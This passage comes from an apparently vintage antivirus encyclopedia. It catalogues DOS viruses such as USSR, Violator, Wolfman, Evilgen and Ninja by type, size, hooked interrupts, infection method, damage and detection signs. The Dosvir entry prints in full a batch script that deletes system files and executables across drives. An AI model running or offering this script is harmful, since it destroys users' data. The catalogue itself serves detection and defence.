  10481. message: "Today is Sunday! Why do you work so hard? All work and no
  10482. play makes you a dull boy! Come on! Let's go out and have some fun!"
  10483.  
  10484. [The Silence of the Lamb!]
  10485. Virus Name: The Silence Of The Lamb!
  10486. Virus Type: Memory Resident, File Virus (COM files)
  10487. Virus Length: 555 bytes
  10488. PC Vectors Hooked: INT 21h, INT 24h
  10489.  
  10490. Execution Procedure:
  10491. 1) Checks whether it is still in the last memory block. If not, it
  10492.     stays resident in the high memory and returns to the original
  10493.     routine.
  10494.  
  10495. Infection Procedure:
  10496. 1) Encodes the first 200h bytes of the original file.
  10497. 2) Attaches them and the decoded codes at the end of the file.
  10498. 3) Encodes the virus code and writes them onto the first 200h bytes
  10499.     of the file.
  10500.  
  10501. Damage: None
  10502.  
  10503. Notes:
  10504. 1) Hooks INT 21H (AH=4Bh) to infect files.
  10505. 2) Hangs INT 24h to prevent divulging its trace when writing, then
  10506.     checks whether the program to be executed is an uninfected COM
  10507.     file (length must be between 0400h and FA00h bytes). If it is,
  10508.     the virus infects it. Lastly, the virus restores INT 24h.
  10509. 3)  Date and time fields of infected files are not changed.
  10510.  
  10511. Detection Method:
  10512. 1) Call INT21h (AH=2Dh,CH=FFh,DH=FFh) to return the value of AH. If
  10513.     AH=00h, the memory is infected. If AH=FFh, the memory is not
  10514.     infected.
  10515. 2) If the word at address 0002 of the COM file is 5944h, the memory
  10516.     is infected. After the virus code has been decoded, there will
  10517.     be a text in 01E6h-01EFh that reads:
  10518.  
  10519.        " The Silence Of The Lamb!$"
  10520.  
  10521. 3) Total memory decreases by 1568 bytes.
  10522.  
  10523. [USSR]
  10524. Virus Name: USSR
  10525. Other Names: 570, 8-17-88, 2:08a
  10526. Virus Type: Parasitic Virus
  10527. Virus Length: 570 bytes
  10528.  
  10529. Symptom:
  10530. 1) Infects .EXE files. Increases file size by 570 to 585 (570+15) bytes.
  10531.    (The next multiple of 16 of the original file size plus 570).
  10532. 2) The date and time fields in the file's directory entry is set to
  10533.    8-17-88 and 2:08a.
  10534.  
  10535. Damage: Writes one sector to the boot sector of the C drive, then halts
  10536. the system.
  10537.  
  10538. [Vacsina-V16h]
  10539. Virus Name: Vacsina V16h
  10540. Other Names: Virus 1339
  10541. Virus Type: Parasitic Virus, RAM resident
  10542. Virus Length: Approximately 1339 bytes
  10543.  
  10544. Execution Procedure:
  10545. 1) Checks whether it is memory resident. If not, it loads itself
  10546.     resident in the memory by hooking INT 21h.
  10547. 2) It then executes the original file.
  10548. 3) While memory resident, the virus infects any uninfected file that
  10549.     is executed.
  10550.  
  10551. Damage: The virus modifies the Ping-Pong virus in the memory. The virus
  10552. changes two bytes, jumps, and adds one subroutine. It is interesting
  10553. that the Ping-Pong virus is ready to change in this manner. After 255
  10554. reboots, the infected disk is deactivated in the memory, returning the
  10555. original interrupt vector to 13h with the value of 0:413h. The virus
  10556. proceeds to play the "Yankee Doodle" song.
  10557.  
  10558. Note: Loads itself resident in the memory. An error message appears if
  10559. there is an I/O error (such as write protect).
  10560.  
  10561. [VCL-2-B]
  10562. Virus Name: Vcl-2-B
  10563. Virus Type: File Virus (infects .COM files)
  10564. Virus Length: 663 Bytes(COM)
  10565. PC Vectors Hooked: None
  10566.  
  10567. Execution Procedure:
  10568. 1) Searches for a .COM file in the current directory.
  10569. 2) Once it locates a file it checks whether it has been infected by
  10570.     VCL-2. If it has, it continues to look for any uninfected .COM file.
  10571. 3) It only infects two files at a time.
  10572.  
  10573. Damage: None
  10574.  
  10575. Detection Method:
  10576. 1) Infected files increase by 663 Bytes.
  10577.  
  10578. Note:
  10579. 1) Doesn't stay resident in the memory.
  10580. 2) Doesn't hook INT 24h when infecting files. Error message appears if
  10581.     there is an I/O error (such as write protect).
  10582.  
  10583. [Violator]
  10584. Virus Name: Violator
  10585. Other Names: Violator Strain B, Violator BT
  10586. Virus Type: File Virus
  10587. Virus Length: 1055 bytes (COM files)
  10588.  
  10589. Execution Procedure:
  10590. 1) Checks whether it is memory resident. If not, it loads itself
  10591.    resident in the memory by hooking INT 21h.
  10592. 2) It then executes the original file.
  10593. 3) While memory resident the virus infects any uninfected file that
  10594.    is executed. Doesn't infect .EXE files.
  10595.  
  10596. Damage: If the system date is after Aug 15, 1990, the virus will format
  10597. the first cylinder of the current drive.
  10598.  
  10599. Detection Method:
  10600. 1) Infected .COM files increase by 1055 bytes.
  10601.  
  10602. Note:
  10603. 1) Loads itself resident in the memory.
  10604. 2) An error message appears if there is an I/O error (such as write
  10605.    protect).
  10606.  
  10607. [Virus 9]
  10608. Virus Name: Virus9
  10609. Virus Type: File Virus (infects .COM files)
  10610. Virus Length: 256 Bytes (COM files)
  10611.  
  10612. PC Vectors Hooked: None
  10613.  
  10614. Execution Procedure:
  10615. 1) Searches for a .COM file in the current directory.
  10616. 2) It infects all uninfected files until all files in the current and
  10617.    the "mother" directories are infected.
  10618.  
  10619. Damage: None
  10620.  
  10621. Detection Method: Infected files increase by 256 Bytes.
  10622.  
  10623. Note:
  10624. 1) Doesn't stay resident in the memory.
  10625. 2) Doesn't hook INT 24h when infecting files. Error message appears
  10626.    if there is an I/O error (such as write protect).
  10627. 3) The virus does not reinfect.
  10628.  
  10629.  
  10630. [WinWORD_Nuclear]
  10631. Virus Name: WinWORD_Nuclear
  10632. Virus Type: File Virus
  10633. Virus Length: N/A
  10634.  
  10635. Description: This virus infects MSWORD documents.
  10636. When an infected document is opened, the virus goes resident by
  10637. adding some macros to your WORD environment. The virus also runs a
  10638. macro called PayLoad which wipes out your DOS system files on the 5th
  10639. of April.
  10640.  
  10641. Once the virus is active, all documents saved using the "Save As..."
  10642. command will be infected. Occasionally, printed documents will have
  10643. the following two lines of text added:
  10644.  
  10645.   "And finally I would like to say:
  10646.    STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC"
  10647.  
  10648. The virus may also try to inject a DOS file virus "Ph33r" into your
  10649. system.
  10650.  
  10651. [Wit Code]
  10652. Virus Name: WITCODE
  10653. Other names: None
  10654. Virus Type: File Virus
  10655. Virus Length: 965/975 bytes
  10656. PC Vectors Hooked: INT 21h
  10657.  
  10658. Execution Procedure:
  10659. 1) Checks whether it is memory resident. If not, it loads itself
  10660.     resident in the memory by hooking INT 21h.
  10661. 2) It then executes the original file.
  10662. 3) Once memory resident it infects any uninfected file that is
  10663.     executed.
  10664.  
  10665. Damage: None
  10666.  
  10667. Detection Method: Increases infected file size by 965/975 bytes
  10668.  
  10669. Note:
  10670. 1) Loads itself resident in the memory.
  10671. 2) An error message appears if there is an I/O error (such as write
  10672.     protect).
  10673.  
  10674.  
  10675. [XQR-B]
  10676. Virus Name: XQR-B
  10677. Virus Type: File Virus (infects .COM and .EXE files) and
  10678.             Partition Table Infector
  10679. Virus Length: No change
  10680. PC Vectors Hooked: INT 21h, INT 24h, INT 13h, INT 8h
  10681.  
  10682. Execution Procedure:
  10683. 1) When you execute an infected file, the virus infects Sector #1.
  10684. 2) Checks whether it is memory resident. If not, it loads itself
  10685.     resident in the memory by hooking INT 21h, INT 8h, and INT 13h.
  10686. 3) If the system date is May 4, the virus displays this message:
  10687.  
  10688.    " XQR: Wherever, I love you Forever and ever! The beautiful memory
  10689.    for ours in that summer time has been recorded in Computer history .
  10690.    Bon voyage, My dear XQR! "
  10691.  
  10692. 4) Infects every uninfected file that is executed.
  10693.  
  10694. Damage: The virus changes the keyboard configuration every Sunday.
  10695.  
  10696. Detection Method: Check whether or not the keyboard is working
  10697. properly.
  10698.  
  10699. Note:
  10700. 1) Hooks INT 24h when infecting files. It omits I/O errors (such as
  10701.     write protect).
  10702.  
  10703. [Yonyu]
  10704. Virus Name: YONYU
  10705. Virus Type: Boot Sector and Partition Infector
  10706. Virus Length: None.
  10707. PC Vectors Hooked: INT 13h
  10708.  
  10709. Execution Procedure:
  10710. 1) The virus decreases, by 1K bytes, the total memory when the system
  10711.     is booted from an infected disk.
  10712. 2) It loads itself resident into the last 1K bytes of the memory.
  10713. 3) Hooks INT 13h.
  10714. 4) Infects the diskette.
  10715.  
  10716. Damage: None
  10717.  
  10718. Detection Method: Decreases total memory by 1K Bytes.
  10719.  
  10720. Note:
  10721. 1) Doesn't hook INT 24h when infecting files. It omits I/O errors
  10722.     (such as write protect).
  10723.  
  10724.  
  10725. [Gorlovka]
  10726. Virus Name: Gorlovka
  10727. Virus Type: Memory resident, File Virus (COM and EXE files)
  10728. Virus Length:
  10729. PC Vectors Hooked: INT 21h, INT 24h
  10730.  
  10731. Execution Procedure:
  10732. 1) Checks whether it resides in the memory. If it is, the virus
  10733.     displays the following message: "Tracing mode has been destroyed."
  10734.     Otherwise, it loads itself resident in the high memory.
  10735. 2) Hooks INT 21h and then displays: "Tracing mode has been destroyed."
  10736.  
  10737. Infection Procedure: Hooks INT 21H(AH=4Bh). First, it will hang INT
  10738. 24h to prevent divulging its trace when writing, then checks
  10739. whether the program to be executed is an uninfected COM or EXE
  10740. file. If it is, the virus proceeds to infect it. Lastly, the virus
  10741. restores INT 24h.
  10742.  
  10743. Damage: The virus overwrites the original files with the virus code,
  10744. thus corrupting them.
  10745.  
  10746. Note: Infected file sizes are not changed.
  10747.  
  10748. Detection Method: Check for the above message.
  10749.  
  10750. [Akuku-649]
  10751. Virus Name: Akuku-649
  10752. Virus Type: File Virus (COM files)
  10753. Virus Length: 649 bytes
  10754.  
  10755. Execution Procedure:
  10756. 1) Searches for all uninfected COM files on the current directory
  10757.     (it does not infect the same file twice) and then proceeds to
  10758.     infect them.
  10759. 2) No matter whether it has infected files or not, it will check
  10760.     whether the current calendar year is greater than 1994, the
  10761.     current month is greater than 6, the current day is greater
  10762.     than 6, and the current time is after 15:00. If all these
  10763.     conditions are met, the virus displays the following message:
  10764.  
  10765.           "A kuku frajerze."
  10766.  
  10767. Damage: None
  10768.  
  10769. Note:
  10770. 1) Does not stay in the memory.
  10771. 2) Before infecting files, it will hang INT 24h to prevent
  10772.     divulging its trace when writing.
  10773.  
  10774. Detection Method: Infected files increase by 649 bytes.
  10775.  
  10776. [Cossiga]
  10777. Virus Name: Cossiga
  10778. Virus Type: File Virus (EXE files)
  10779. Virus Length:
  10780.  
  10781. Execution Procedure:
  10782. 1) Searches for an uninfected EXE file on the current directory, and
  10783.    then infects it (only infects one file at a time).
  10784. 2) No matter whether it has infected files or not, it will check
  10785.    whether the current date is after 10/17/1991. If it is, the virus
  10786.    displays the following message:
  10787.  
  10788.     "COSSIGA ?! NO GRAZZIE ! By Amissi dee Panoce (c) 1991 "
  10789.  
  10790. Damage: It overwrites the original files with the virus code, thus
  10791. corrupting the files.
  10792.  
  10793. Note:
  10794. 1) Does not stay in the memory.
  10795. 2) An error message appears when writing because INT 24h has
  10796.    not been hanged.
  10797.  
  10798. [DOS Vir]
  10799. Virus Name: Dosvir
  10800. Virus Type: TROJAN
  10801. Virus Length: 3004 bytes
  10802.  
  10803. Execution Procedure:
  10804. 1) The virus creates a batch file with the following commands:
  10805.         CLS
  10806.         echo Cracked by Cracking Kr .e 20 2
  10807.         echo Loading game.  .Please Wait....
  10808.         c:
  10809.         CD\
  10810.         DEL autoexec.bat
  10811.         DEL *.exe
  10812.         DEL *.com
  10813.         DEL *.exe
  10814.         DEL *.com
  10815.         DEL *.sys
  10816.         ATTRIB..-r ibmbio.com
  10817.         ATTRIB..-r ibmdos.com
  10818.         ATTRIB..-r ibmbio.sys
  10819.         ATTRIB..-r ibmdos.sys
  10820.         DEL ibmbio.com
  10821.         DEL ibmdos.com
  10822.         DEL ibmbio.sys
  10823.         DEL ibmdos.sys
  10824.         CD\bbs
  10825.         DEL *.exe
  10826.         DEL *.com
  10827.         CD\dos
  10828.         DEL *.exe
  10829.         DEL *.com
  10830.         d:
  10831.         CD\
  10832.         DEL autoexec.bat
  10833.         DEL *.exe
  10834.         DEL *.com
  10835.         CD\dos
  10836.         DEL *.exe
  10837.         DEL *.com
  10838.         CD\bbs
  10839.         DEL *.exe
  10840.         DEL *.com
  10841.         CLS
  10842. 2) Executes the batch file.
  10843.  
  10844. [Deranged]
  10845. Virus Name: Deranged
  10846. Virus Type: File Virus (EXE files)
  10847. Virus Length: 419 bytes
  10848.  
  10849. Execution Procedure:
  10850. 1) Searches for all uninfected EXE files on the current directory, and
  10851.    then proceeds to infect them.
  10852.  
  10853. Damage: None
  10854.  
  10855. Note:
  10856. 1) Because the virus procedure is not well written, the system halts
  10857.    when an infected file is executed.
  10858. 2) Does not stay in the memory.
  10859. 3) An error message appears when writing because INT 24h has
  10860.    not been hanged.
  10861.  
  10862. Detection method: Infected files increase by 419 bytes.
  10863.  
  10864. [James]
  10865. Virus Name: James
  10866. Virus Type: File Virus (COM files)
  10867. Virus Length: 356 bytes
  10868.  
  10869. PC Vectors Hooked: INT 21h, INT 24h
  10870.  
  10871. Execution Procedure:
  10872. 1) Checks whether it is memory resident. If not, it loads itself
  10873.    resident in the high memory.
  10874. 2) Hooks INT 21h and goes back to original routine.
  10875.  
  10876. Infection Procedure: Hooks INT 21H (AH=4Bh) to infect files. First,
  10877. it hangs INT 24h to prevent divulging its trace when writing,
  10878. then checks whether the program to be executed is an uninfected
  10879. COM file. If it is, the virus proceeds to infect it. Lastly, the
  10880. virus restores INT 24h.
  10881.  
  10882. Damage: None
  10883.  
  10884. Detection method: Infected files increase by 356 bytes.
  10885.  
  10886. [Abraxas-3]
  10887. Virus Name: Abraxas-3
  10888. Virus Type: File Virus (EXE files)
  10889. Virus Length: 1200 bytes
  10890.  
  10891. Execution Procedure:
  10892. 1) The virus plays the song "Do Re Mi Fa So La Si Do Re......".
  10893. 2) Displays the message:
  10894.  
  10895.        "abraxas"
  10896.  
  10897.     in enlarged font.
  10898. 3) Searches for an uninfected EXE file on the current directory and
  10899.     proceeds to infect it (only infects one file at a time). The method
  10900.     of infection is: it creates a file with the same name as the
  10901.     original file, and its length is 1200 bytes.
  10902.  
  10903. Damage: The virus overwrites the original files with the virus code,
  10904. thus corrupting them.
  10905.  
  10906. Detection Method: Infected file length is 1200 bytes.
  10907.  
  10908. [Wolfman]
  10909. Virus Name: Wolf-Man
  10910. Virus Type: Memory Resident, File Virus (COM and EXE files)
  10911. Virus Length: 2064 bytes
  10912. PC Vectors Hooked: INT 09h, INT 10h, INT 16h, INT 21h
  10913.  
  10914. Execution Procedure:
  10915. 1) Checks whether it remains resident in the memory. If not, it loads
  10916.     itself resident into the memory.
  10917. 2) Checks whether the current calendar day is 15. If it is, the virus
  10918.     will manifest itself. Otherwise, it will hook INT 09H, INT 10H,
  10919.     INT 16H, and INT 21H, then it will go back to the original
  10920.     routine.
  10921.  
  10922. Infection Procedure:
  10923. 1) Hooks INT 21H to infect files. It checks whether the program to be
  10924.     executed is an infectable file (except COMMAND.COM), and then
  10925.     proceeds to infect it (the infectable file length must be larger
  10926.     than 1400 bytes).
  10927. 2) Hooks INT 9h and INT 10h to check for a change in the program. If
  10928.     there is, the virus will manifest itself.
  10929.  
  10930. Symptoms: Displays a message. Overwrites the current diskette with
  10931. the virus code until there is no more free space left. Delays 30
  10932. seconds and then proceeds to reboot the system.
  10933.  
  10934. Damage: Destroys all data on the current diskette.
  10935.  
  10936. Note:
  10937. 1) Procedure for displaying the virus message is designed for the
  10938.     Herc display card. Therefore, the system will halt if the virus
  10939.     is run on a color display card. This, in turn, can prevent
  10940.     destruction of the hard disk.
  10941. 2) Virus procedure contains the text : "WOLFMAN"
  10942.  
  10943. Detection Method:
  10944. 1) Infected files increase by 143 bytes.
  10945. 2) Use MEM.EXE to check whether an executed program remains resident
  10946.     in the memory (it will occupy approximately 65.6K bytes).
  10947.  
  10948. [Cuban]
  10949. Virus Name: Cuban
  10950. Virus Type: File Virus (COM files)
  10951. Virus Length: 1501 bytes
  10952. PC Vectors Hooked: INT 21h, INT 24h
  10953.  
  10954. Execution Procedure:
  10955. 1) Checks whether it is memory resident. If not, it loads itself
  10956.     resident in the high memory.
  10957. 2) Hooks INT 21h and goes back to original routine.
  10958. 3) Checks whether the current calendar day is 30. If it is, the virus
  10959.     proceeds to destroy all data on the hard disk.
  10960.  
  10961. Infection Procedure:
  10962. 1) Hooks INT 21H (AH=4Bh) to infect files. First, it hangs
  10963.     INT 24h to prevent divulging its trace when writing. If the
  10964.     program to be executed is an uninfected COM file, the virus
  10965.     infects it directly. If the program to be executed is an EXE
  10966.     file, it will search for an unfixed COM file and infect this COM
  10967.     file.
  10968. 2) Restores INT 24h.
  10969.  
  10970. Damage: The virus sometimes destroys all data on the hard disk.
  10971.  
  10972. Detection Method: Infected files increase by 1501 bytes.
  10973.  
  10974. [Darkend]
  10975. Virus Name: Darkend
  10976. Virus Type: File Virus (EXE files)
  10977. Virus Length: 1188 bytes
  10978. PC Vectors Hooked: INT 21h
  10979.  
  10980. Execution Procedure:
  10981. 1) Checks whether it is memory resident. If not, it loads itself
  10982.     resident in the high memory.
  10983. 2) Hooks INT 21h and goes back to original routine.
  10984. 3) Checks whether the current date is October 15. If it is, the virus
  10985.     destroys all data on the hard disk.
  10986.  
  10987. Infection Procedure:
  10988. 1) Hooks INT 21H (AH=4Bh) to infect files. If the program to be
  10989.     executed is an uninfected EXE file, the virus proceeds to
  10990.     infect it directly.
  10991.  
  10992. Damage: The virus sometimes destroys all data on the hard disk.
  10993.  
  10994. Detection method: Infected files increase by 1188 bytes.
  10995.  
  10996. [Story-A]
  10997. Virus Name: Story-A
  10998. Virus Type: File Virus (COM files)
  10999. Virus Length: 1117 bytes
  11000. PC Vectors Hooked: INT 08h
  11001.  
  11002. Execution Procedure:
  11003. 1) Searches for three (3) uninfected COM files (excluding COMMAND.COM)
  11004.     in the root directory and all subdirectories, and then infects
  11005.     them (does not infect the same file twice).
  11006. 2) Holds the order of every infected file.
  11007. 3) Checks if the order of the current infected file is larger than 7,
  11008.     or if the current date is July 9. If one of these two conditions
  11009.     is met, the virus will activate.
  11010.  
  11011. Symptoms: Does not execute infection procedure, stays resident in
  11012. the memory. Then hooks INT 08h. 290 seconds later, a message appears
  11013. repeatedly (in 22-second cycles) in inverse mode.
  11014.  
  11015. Note: Date and time fields of infected files are not changed.
  11016.  
  11017. Detection Method:
  11018. 1) Memory:
  11019.     a) Total system memory decreases.
  11020.     b) Virus might be triggered if the first 4 bytes of the segment
  11021.         (before free memory) are FFh, 26h, 04h and 01h.
  11022. 2) File:
  11023.     a) Infected files increase by 1117 bytes.
  11024.     b) First 4 bytes of infection are FFh, 26h, 04h and 01h.
  11025.  
  11026. [Story-B]
  11027. Virus Name: Story-B
  11028. Virus Type: File Virus (COM files)
  11029. Virus Length: 1168 bytes
  11030. PC Vectors Hooked: INT 08h
  11031.  
  11032. Execution Procedure:
  11033. 1) Searches for three (3) uninfected COM files (excluding COMMAND.COM)
  11034.     in the root directory and all subdirectories, and then infects them
  11035.     (does not infect the same file twice).
  11036. 2) Holds the order of infected files.
  11037. 3) Checks if the order of the current infected file is larger than 7,
  11038.     or whether the current month is December. If one of these two
  11039.     conditions is met, the virus will activate.
  11040.  
  11041. Symptoms: Does not execute infection procedure, stays resident in the
  11042. memory. Then hooks INT 08h. 290 seconds later, a message appears
  11043. repeatedly (in 22-second cycles) in inverse mode.
  11044.  
  11045. Note: Date and time fields of infected files are not changed.
  11046.  
  11047. Detection method:
  11048. 1) Memory:
  11049.     a) Total system memory decreases.
  11050.     b) Virus might be triggered if the first 4 bytes of the segment
  11051.         (before free memory) are FFh, 26h, 04h and 01h.
  11052. 2) File:
  11053.     a) Infected files increase by 1168 bytes.
  11054.     b) First 4 bytes of infection are FFh, 26h, 04h and 01h.
  11055.  
  11056. [MS DOS 3.0]
  11057. Virus Name: Ms-Dos3.0
  11058. Virus Type: File Virus (COM files)
  11059. Virus Length:  953 bytes
  11060. PC Vectors Hooked: INT 21h
  11061.  
  11062. Execution Procedure:
  11063. 1) Checks whether it is memory resident. If not, it loads itself
  11064.     resident in the high memory.
  11065. 2) Hooks INT 21h and returns to the original routine.
  11066.  
  11067. Infection Procedure:
  11068. 1) Hooks INT 21H (AH=3Dh,AX=4B00h) to infect files. If the program to
  11069.     be executed or opened is an uninfected COM file (except
  11070.     COMMAND.COM) and its length is not larger than FB00h, the virus
  11071.     proceeds to infect it. The method of infection is: it writes a
  11072.     total of 35Dh bytes (1Ch bytes for the head, first 3B9h bytes of
  11073.     the file) at the end of the file, then overwrites its first 3B9h
  11074.     bytes with the virus code. If the program to be executed or opened
  11075.     is an uninfected EXE file and its length is not larger than 4000h,
  11076.     the virus infects it. The method of infection is: after filling the
  11077.     left bytes of the segment, it will attach a total of 3F1h bytes
  11078.     (virus codes(3B9h)+data in original file(1Ch)+head offile(1Ch))
  11079.     at the end of the file, then change the pointer to point to the
  11080.     virus procedure.
  11081.  
  11082. Damage: None
  11083.  
  11084. Note:
  11085. 1) Date and time fields of infected files are not changed.
  11086. 2) Stealth type virus: restores infected file information while the
  11087.     virus is memory resident.
  11088.  
  11089. Detection method:
  11090. 1) Memory:
  11091.     a) Total system memory decreases by 7A0h bytes.
  11092.     b) Memory might be infected if AX=9051h (AX is the returned value
  11093.         when INT 21h(AH=B3h) is called).
  11094. 2) File:
  11095.     a) Infected COM files increase by 500 bytes.
  11096.     b) Infected EXE files increase by 1009-1024 bytes.
  11097.     c) Use DEBUG to load an infected file.
  11098.  
  11099. [Evilgen]
  11100. Virus Name: Evilgen
  11101. Virus Type: File Virus (COM and EXE files)
  11102. Virus Length:  955 bytes (Version 1.1), 963 bytes (Version 2.0)
  11103. PC Vectors Hooked: INT 21h
  11104.  
  11105. Execution Procedure:
  11106. 1) Checks whether it is memory resident. If not, it loads itself
  11107.     resident in the high memory.
  11108. 2) Hooks INT 21h and INT 09h and goes back to the original routine.
  11109. 3) Checks if the current day is 24 and if the "Del" key is depressed.
  11110.     If so, the virus will activate.
  11111.  
  11112. Infection Procedure:
  11113. 1) Hooks INT 21H(AX=4B00h) to infect files. If the program to be
  11114.     executed is an uninfected EXE or COM file, the virus proceeds to
  11115.     infect it.
  11116. 2) Hooks INT 09h to check whether the "Del" key is depressed.
  11117.  
  11118. Symptom: Selects a sector on the C drive, then formats the sector from
  11119. head 0, track 0 to head 0, track 20h.
  11120.  
  11121. Damage: The virus sometimes destroys the C drive.
  11122.  
  11123. Note:
  11124. 1) Date and time fields of infected files are not changed.
  11125. 2) While memory resident, typing " Dir" will not display the change
  11126.     in the sizes of infected files.
  11127.  
  11128. Detection method:
  11129. 1) Memory:
  11130.     a) Total system memory decreases.
  11131.     b) COMMAND.COM on the root directory of C is infected if BX=9051h
  11132.        (BX is the returned value when INT 21h(AX=7BCDh) is called).
  11133.     c) The pointers of INT 21h and INT 09h are the same.
  11134.  
  11135. 2) File:
  11136.     Infected files increase by 955 bytes (Version 1.1) or 963
  11137.     bytes (Version 2.0.). These changes are only apparent if
  11138.     the virus is not memory resident.
  11139.  
  11140. [Decide-2]
  11141. Virus Name: Decide-2
  11142. Virus Type: File Virus (COM files)
  11143. Virus Length: 1335 bytes
  11144.  
  11145. Execution Procedure:
  11146. 1) Searches for an uninfected COM file on the current directory, and
  11147.     then infects it (only infects one file at a time).
  11148. 2) No matter whether it has infected a file or not, it will check
  11149.     whether the current calendar month is September or October, and
  11150.     the current day is between 3 and 18. If it is, the virus displays
  11151.     the following:
  11152.  
  11153.      "As the good times of DECIDE will be remembered, I started to
  11154.      make a new virus. You are not facing the dark tombs of
  11155.      "Morgoth". Humble regards to : Pazuzu, Kingu, Absu Mummu
  11156.      Tiamat, Baxaxaxa Baxaxaxa, Yog Sothoth Iak Sakkath, Kutulu,
  11157.      Humwawa Xaztur, Hubbur Shub Niggurath. Also my lovely regards
  11158.      go to Stephanie, the only one who makes my heart beat
  11159.      stronger. Want to make love with a Moribid Angel? Glenn
  11160.      greets ya. Press a key to start the program..."
  11161.  
  11162. Damage: None
  11163.  
  11164. Note:
  11165. 1) Does not remain in the memory.
  11166. 2) An error message appears when writing because INT 24h has
  11167.     not been hanged.
  11168.  
  11169. Detection method: Infected files increase by 1335 bytes.
  11170.  
  11171. [ED]
  11172. Virus Name: Ed
  11173. Virus Type: File Virus (COM and EXE files)
  11174. Virus Length: 775-785 bytes
  11175. PC Vectors Hooked: INT 21h, INT 24h
  11176.  
  11177. Execution Procedure:
  11178. 1) Checks whether it is memory resident. If not, it loads itself
  11179.     resident in the high memory by hooking INT 21h.
  11180. 2) Hooks INT 21h and goes back to the original routine.
  11181.  
  11182. Infection Procedure:
  11183. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  11184.     prevent divulging its trace when writing. If the program to be
  11185.     executed is an uninfected COM or EXE file, the virus proceeds to
  11186.     infect it.
  11187.  
  11188. Damage: There is a flag in the virus procedure (every infected file
  11189. has a different flag). The flag decreases by 1 every time the virus
  11190. infects a new file. When the flag reaches zero, the virus will
  11191. destroy all data on the hard disk.
  11192.  
  11193. Detection method: Infected files increase by 775-785 bytes.
  11194.  
  11195. [Dima]
  11196. Virus Name: Dima
  11197. Virus Type: File Virus (COM and EXE files)
  11198. Virus Length: 1024 bytes
  11199. PC Vectors Hooked: INT 24h
  11200.  
  11201. Execution Procedure: Searches for all uninfected COM and EXE files
  11202. on all directories, and infects them. Hooks INT 24H to prevent
  11203. divulging its trace when writing.
  11204.  
  11205. Detection method: Infected files increase by 1024 bytes.
  11206.  
  11207. [Digger]
  11208. Virus Name: Digger
  11209. Virus Type: File Virus (COM and EXE files)
  11210. Virus Length:  1472-1482 bytes
  11211.  
  11212. Execution Procedure:
  11213. Searches for an uninfected COM or EXE file on the current directory,
  11214. and then infects it (does not reinfect).
  11215.  
  11216. Damage: None
  11217.  
  11218. Note:
  11219. 1) Does not stay in the memory.
  11220. 2) An error message appears when writing because INT 24h has
  11221.    not been hanged.
  11222.  
  11223. Detection Method: Infected files increase by 1472-1482 bytes.
  11224.  
  11225. [FVHS]
  11226. Virus Name: Fvhs
  11227. Virus Type: File Virus (COM and EXE files)
  11228. Virus Length:
  11229.  
  11230. Execution Procedure:
  11231. Searches for an uninfected COM or EXE file on the current and
  11232. parent directories, then infects it. It infects three files at
  11233. a time.
  11234.  
  11235. Damage: It overwrites the original files with the virus code, thus
  11236. corrupting the files.
  11237.  
  11238. Note:
  11239. 1) Does not stay in the memory.
  11240. 2) An error message appears when writing because INT 24h has
  11241.    not been hanged.
  11242.  
  11243. [Egg]
  11244. Virus Name: Egg
  11245. Virus Type: File Virus (EXE files)
  11246. Virus Length: 1000-1005 bytes
  11247. PC Vectors Hooked: INT 21h, INT 24h
  11248.  
  11249. Execution Procedure:
  11250. 1) Checks whether it is memory resident. If not, it loads itself
  11251.     resident in the high memory.
  11252. 2) Hooks INT 21h and goes back to the original routine.
  11253.  
  11254. Infection Procedure:
  11255. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  11256.     prevent divulging its trace when writing. If the program to be
  11257.     executed is an uninfected EXE file, the virus proceeds to infect
  11258.     it.
  11259.  
  11260. Damage: None
  11261.  
  11262. Detection method: Infected files increase by 1000-1005 bytes.
  11263.  
  11264. [Freddy]
  11265. Virus Name: Freddy
  11266. Virus Type: File Virus (EXE and COM files)
  11267. Virus Length:  1870-1880 bytes
  11268. PC Vectors Hooked: INT 21h
  11269.  
  11270. Execution Procedure:
  11271. 1) Checks whether it is memory resident. If not, it loads itself
  11272.     resident in the high memory.
  11273. 2) Hooks INT 21h and goes back to the original routine.
  11274.  
  11275. Infection Procedure:
  11276. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  11277.     executed is an uninfected COM or EXE file, the virus proceeds
  11278.     to infect it. The virus sometimes searches concurrently for
  11279.     other uninfected files to infect.
  11280.  
  11281. Damage: None
  11282.  
  11283. Note: An error message appears when writing because INT 24h has
  11284. not been hanged.
  11285.  
  11286. Detection method: Infected files increase by 1870-1880 bytes.
  11287.  
  11288. [Ninja]
  11289. Virus Name: Ninja
  11290. Virus Type: File Virus (EXE and COM files)
  11291. Virus Length:  1511 or 1466 bytes
  11292.  
  11293. PC Vectors Hooked: INT 21h
  11294.  
  11295. Execution Procedure:
  11296. 1) Checks whether it is memory resident. If not, it loads itself
  11297.    resident in the high memory.
  11298. 2) Hooks INT 21h and goes back to the original routine.
  11299. 3) Checks whether the current calendar year is 1992, current day is 13,
  11300.    and current time is 13:00. If these conditions are met, the virus
  11301.    proceeds to destroy all data on the hard disk.
  11302.  
  11303. Infection Procedure:
  11304. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  11305.    is an uninfected EXE or COM file, the virus infects it.
  11306.  
  11307. Damage: The virus sometimes destroys all data on the hard disk.
  11308.  
  11309. Detection method: Infected files increase by 1511 or 1466 bytes.
  11310.  
  11311. [Yan-2505A]
  11312. Virus Name: Yan2505a
  11313. Virus Type: File Virus (EXE and COM files)
  11314. Virus Length: 2505 bytes
  11315.  
  11316. PC Vectors Hooked: INT 21h, INT 24h
  11317.  
  11318. Execution Procedure:
  11319. 1) Checks whether it is memory resident. If not, it loads itself
  11320.    resident in the high memory.
  11321. 2) Hooks INT 21h and returns to the original routine.
  11322.  
  11323. Infection Procedure:
  11324. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  11325.    prevent divulging its trace when writing. If the program to be
  11326.    executed is an uninfected COM or EXE file, the virus proceeds to
  11327.    infect it.
  11328.  
  11329. Damage: None
  11330.  
  11331. Detection method: Infected files increase by 2505 bytes.
  11332.  
  11333. [Suicide]
  11334. Virus Name: Suicide
  11335. Virus Type: File Virus (COM and EXE files)
  11336. Virus Length: 2048 bytes
  11337.  
  11338. Execution Procedure: Searches for uninfected COM and EXE files on
  11339. the current directory, and then infects them. It infects four files
  11340. at a time.
  11341.  
  11342. Damage: None
  11343.  
  11344. Note:
  11345. 1) Does not stay in the memory.
